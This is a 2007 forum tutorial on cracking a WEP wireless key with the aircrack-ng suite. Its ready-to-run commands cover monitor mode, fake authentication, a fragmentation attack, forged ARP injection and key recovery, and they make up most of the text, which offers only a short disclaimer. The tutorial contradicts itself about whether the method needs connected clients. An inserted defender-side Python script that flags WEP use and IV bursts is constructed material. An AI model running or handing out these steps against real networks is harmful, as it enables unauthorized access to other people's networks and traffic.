CRACKING WEP WITH NO CLIENTS
OK, this tutorial should be pretty straightforward and easy; then again, that's the entire idea behind a tutorial, right? Anyway, to business: this tutorial will show you how to crack WEP very quickly using aircrack on the BackTrack security live CD, which you can find here:
http://www.remote-exploit.org/backtrack.html
**Quick note: cracking WEP with no clients will be out tonight/sometime real soon**
We will go over
1) Putting your atheros based card into monitor mode
2) Getting packet injection ready
3) injecting/sniffing
4) Cracking the WEP
This is the easier method, the one where the WEP network has clients present, so you can use a deauth attack on them. OK, enough talk, to business!
Monitor Mode
The first thing to do is boot up BackTrack, basically by booting from the CD like you normally would; if you can't figure this out, ask down below, or go use Google. Log in to BackTrack as root (password 'toor'), and then type "startx" at the command line to start the GUI. Sweet, now we are running *nix, and we can start the good stuff. Open up a command line by clicking on the icon that looks like one at the bottom, next to the 'start'-type thingy (let me know if I get too technical :) )
Now, we need to enter this into the command line;
Code:
$ airmon-ng start wifi0 6
**Starts wifi0 on channel 6; change this to the channel of the network you are attacking. Use Kismet to find it; that is not covered in this tutorial**
$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6
Sweet, now we have our card in monitor mode, and we can move onto
bigger and better things.
Starting up airodump and getting some info ready
OK, let's start airodump so we can get some info out of it, and then we can just leave it running.
Code:
$ airodump-ng --ivs --write bob --channel 6 ath1
**Basically, here's what each thing means:
--ivs = only write the weak IVs, not every packet
--write = the prefix of the file we are writing to, so bob.ivs
--channel = the channel to scan on
ath1 = our network device**
Now that airodump is running, we need to snag a couple of pieces of information from it: 1) the MAC address of the AP we are attacking, which will be in the first column, and 2) the ESSID of the network, i.e. "linksys" or something similar.
Now, open up a new terminal (DON'T CLOSE AIRODUMP) and type this line in:
Code:
$ export AP=mac_of_ap
Now we also have to get our own MAC address; this is easy in BackTrack, just type in the following:
Code:
$ macchanger --show ath1
**your output here**
$ export MAC=your_mac_address
This basically just stores those values as shell variables, so you don't have to type them a bunch of times in the coming steps.
Getting everything ready
Basically, what we are going to do to the network is fake-authenticate ourselves using aireplay. Then, using the same program, we are going to grab some pieces of packets out of the replies to the fake auth, and use those to create an ARP reply packet with packetforge, which we inject into the network to generate IVs so we can crack the key! Whew, let's get started!
First we need to set up, but NOT run, our fake auth attack:
Code:
$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1
So, we are running aireplay attack 1 with no delay; "linksys" is the ESSID of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our own MAC address. Don't run this yet, we will soon enough.
Open up another command line, so we can get ready to sniff out the packets we need. Enter the following:
Code:
$ aireplay-ng -5 -b $AP -h $MAC ath1
Cool, step 1 of 2 is done for getting ready to create IVs; next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it; say yes (type y and press enter). Now you can cancel the first command (stop it from fake-auth'ing over and over) by pressing ctrl-c. Leave the window open.
Now, after we told aireplay-ng -5 yes, it should have created a .xor file. The name of it should be in the output. The line looks like this:
Code:
Saving Keystream in fragment-0215-124336.xor
**yours will be different**
Now, using this .xor file we can create an ARP reply packet which we can inject to create weak IVs. So in the same window where we ran the aireplay-ng -5 command, type in the following:
Code:
$ packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y your_.xor_file.xor -w arp-request
That will generate what we need; now we can run the final injection command that will inject the arp-request packets. Enter the following:
Code:
$ aireplay-ng -2 -r arp-request ath1
**you will have to say yes again, btw**
Now you get to watch the #data column in airodump (you didn't close it, did you?) skyrocket! Wait a few minutes, and when you have 100k packets (in the #data column; 1 million for 128-bit) run the following command to crack the key!
Code:
$ aircrack-ng -n 64 -b $AP *.ivs
**Note: if it's 128-bit, change 64 to 128**
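From the defender's side, the tell in this whole procedure is a WEP network whose IV (#data) count jumps by tens of thousands in a minute. As an added example that is not part of the original tutorial, the Python script below reads two airodump-ng CSV snapshots, flags any AP still using WEP, and flags a WEP AP whose IV count jumped by more than a threshold between snapshots. It assumes the CSV column layout airodump-ng writes next to its capture (the tutorial's --ivs run only writes the .ivs file) and the 10,000-IV threshold; both snapshots are constructed.

```python
# Added defender-side example, not part of the original tutorial. Assumes the
# CSV text airodump-ng writes alongside its capture (AP table first, columns as
# in HEADER below); the two snapshots are constructed, one minute apart.
import csv
from io import StringIO

HEADER = ("BSSID, First time seen, Last time seen, channel, Speed, Privacy, "
          "Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key")
# Constructed snapshots: the WEP AP's IV count jumps the way the tutorial's
# "#data" column does under ARP replay; the WPA2 AP stays quiet.
SNAPSHOT_T0 = HEADER + """
00:11:22:33:44:55, 2007-05-01 12:43:36, 2007-05-01 12:44:00,  6,  54, WEP , WEP, OPN, -40, 120,   250, 0.  0.  0.  0, 7, linksys,
66:77:88:99:AA:BB, 2007-05-01 12:43:36, 2007-05-01 12:44:00, 11,  54, WPA2, CCMP, PSK, -55,  98,     0, 0.  0.  0.  0, 6, office,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""
SNAPSHOT_T1 = HEADER + """
00:11:22:33:44:55, 2007-05-01 12:43:36, 2007-05-01 12:45:00,  6,  54, WEP , WEP, OPN, -40, 240, 48250, 0.  0.  0.  0, 7, linksys,
66:77:88:99:AA:BB, 2007-05-01 12:43:36, 2007-05-01 12:45:00, 11,  54, WPA2, CCMP, PSK, -55, 196,     0, 0.  0.  0.  0, 6, office,
"""

def parse_aps(text):
    """Return {bssid: {essid, privacy, ivs}} from the AP table of one snapshot."""
    aps = {}
    for row in csv.reader(StringIO(text)):
        cells = [c.strip() for c in row]
        if not cells:
            continue                      # blank separator line
        if cells[0] == "Station MAC":
            break                         # client table follows; not needed
        if cells[0] == "BSSID" or len(cells) < 14:
            continue                      # header or truncated row
        aps[cells[0]] = {"essid": cells[13], "privacy": cells[5], "ivs": int(cells[10])}
    return aps

def find_alerts(before, after, iv_burst=10000):
    """Compare two snapshots; iv_burst (an assumed threshold) is IVs per interval."""
    alerts = []
    for bssid, ap in after.items():
        if not ap["privacy"].startswith("WEP"):
            continue
        alerts.append((bssid, ap["essid"], "WEP in use: retire it or move to WPA2/WPA3"))
        delta = ap["ivs"] - before.get(bssid, {}).get("ivs", 0)
        if delta >= iv_burst:
            alerts.append((bssid, ap["essid"], f"+{delta} IVs since last snapshot: consistent with ARP replay injection"))
    return alerts

if __name__ == "__main__":
    for bssid, essid, why in find_alerts(parse_aps(SNAPSHOT_T0), parse_aps(SNAPSHOT_T1)):
        print(f"{bssid} ({essid}): {why}")
```

Run it against successive snapshots of the same prefix-NN.csv file to get a simple alert on either condition; the WPA2 network produces nothing.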
There ya go! You have cracked WEP when there are no clients on the
network!
**This is an educational piece; you should not be cracking anybody else's network, it can get you fined/landed in jail. I take no responsibility for anything you do with this information**
Original Tutorial
by jaymill230 for TheTAZZone-TAZForum
Originally posted on May 1st, 2007 here
Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post...we do not sell, publish, transmit, or have the right to give permission for such...TheTAZZone merely retains the right to use, retain, and publish submitted work within its Network.